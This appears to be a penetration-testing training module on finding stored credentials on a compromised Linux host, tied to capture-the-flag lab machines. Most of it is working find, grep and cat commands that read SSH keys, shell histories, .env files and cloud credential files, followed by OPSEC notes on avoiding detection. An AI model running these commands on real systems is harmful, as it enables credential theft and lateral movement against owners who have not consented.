Back to All Modules

Password and Key Hunting

#Overview

Linux systems store credentials in predictable locations: SSH keys, web application configs, history files, and system credential stores. A systematic search of these locations often yields passwords and keys for privilege escalation or lateral movement without requiring any exploit.

#Prerequisites

  • Shell access to the target
  • Standard tools: find, grep, cat

#Detection & Enumeration

#SSH Key Discovery

# Find all SSH private keys
find / -name id_rsa 2>/dev/null
find / -name id_ecdsa 2>/dev/null
find / -name id_ed25519 2>/dev/null
find / -name "*.pem" 2>/dev/null

# Check ~/.ssh for all users
ls -la /home/*/.ssh/
ls -la /root/.ssh/

# Check authorized_keys (who CAN connect)
cat /home/*/.ssh/authorized_keys
cat /root/.ssh/authorized_keys
BASH

#Config File Password Search

# Broad password search in web directories
grep -r "password" /var/www/ 2>/dev/null | grep -v "password_hash\|password_hash_verify\|empty("
grep -r "passwd" /var/www/ 2>/dev/null
grep -r "DB_PASSWORD\|DB_USER\|DB_HOST" /var/www/ 2>/dev/null

# Search for specific patterns
grep -r "pwd=" /var/www/ 2>/dev/null
grep -r "secret" /var/www/ --include="*.php" 2>/dev/null
grep -r "token" /var/www/ --include="*.php" 2>/dev/null
grep -r "api_key" /var/www/ 2>/dev/null
BASH

#History Files

# Shell histories
cat ~/.bash_history
cat ~/.zsh_history
cat ~/.mysql_history
cat ~/.psql_history
cat ~/.python_history
cat ~/.node_repl_history
cat ~/.lesshst
cat ~/.viminfo

# All users' histories
cat /home/*/.bash_history
find /home -name ".bash_history" -exec cat {} \; 2>/dev/null
BASH

#Stored Credential Files

# Git credentials
cat ~/.git-credentials
cat ~/.netrc
cat ~/.gitconfig

# Docker credentials
cat ~/.docker/config.json

# Cloud credentials
cat ~/.aws/config
cat ~/.aws/credentials
cat ~/.config/gcloud/credentials.db
cat ~/.azure/accessTokens.json

# FTP credentials
cat ~/.netrc
cat ~/.lftp/rc
BASH

#.env Files in Web Directories

# Find all .env files (Laravel, Symfony, Node.js apps)
find /var/www/ -name ".env" 2>/dev/null
find / -name ".env" -not -path "/proc/*" 2>/dev/null

# Find config files with database credentials
find /var/www/ -name "*.config" -o -name "*.ini" -o -name "*.conf" 2>/dev/null
BASH

#Backup Files with Credentials

# Old configuration files often contain unredacted passwords
find /var/www/ -name "*.bak" -o -name "*.old" -o -name "*.backup" -o -name "*.orig" 2>/dev/null
find / -name "*.sql" -o -name "*.sql.gz" -o -name "*.sql.bz2" 2>/dev/null

# WordPress backups
find /var/www/ -name "wp-config.php*" 2>/dev/null
BASH

#Apache/Nginx Config

# Check site configs for credentials
cat /etc/apache2/sites-enabled/*.conf | grep -i password
cat /etc/nginx/sites-enabled/* | grep -i password

# .htpasswd files
find / -name ".htpasswd" 2>/dev/null
BASH

#Common Pitfalls

  • Case sensitivity: search for both "password" and "Password" and "PASSWORD"
  • grep -r without redirecting stderr fills output with "Permission denied" -- always 2>/dev/null
  • Config files may use environment variables (DB_PASSWORD=${DB_PASS}) -- check both the config and the environment
  • SSH private keys found as www-data are only useful if they belong to the root user or are re-used across accounts
  • Some config files are stored outside /var/www/ -- check /opt, /srv, /etc for custom applications

#OPSEC Considerations

  • File reads are extremely low noise and unlikely to trigger alerts.
  • find / -name id_rsa traverses the entire filesystem and generates significant disk I/O -- may be noisy on heavily monitored systems.
  • Reading .bash_history of other users may be logged if auditd is configured to monitor specific user files.
  • grep -r across large directories generates many file open/read calls -- consider using more targeted searches first.

#Post-Exploitation Value

SSH keys provide passwordless access to other systems. Database credentials in config files enable lateral movement and data exfiltration. Git credentials provide access to source code repositories and potentially more credentials. Cloud credentials provide access to external infrastructure.

#Cross-References

#Source Machines

  • Intentions (Hard, Linux) - SSH key exfiltration via capability abuse
  • Monitored (Medium, Linux) - SSH key exfiltration via symlink in sudo-allowed script
  • Cerberus (Hard, Linux) - SSSD cache credential cracking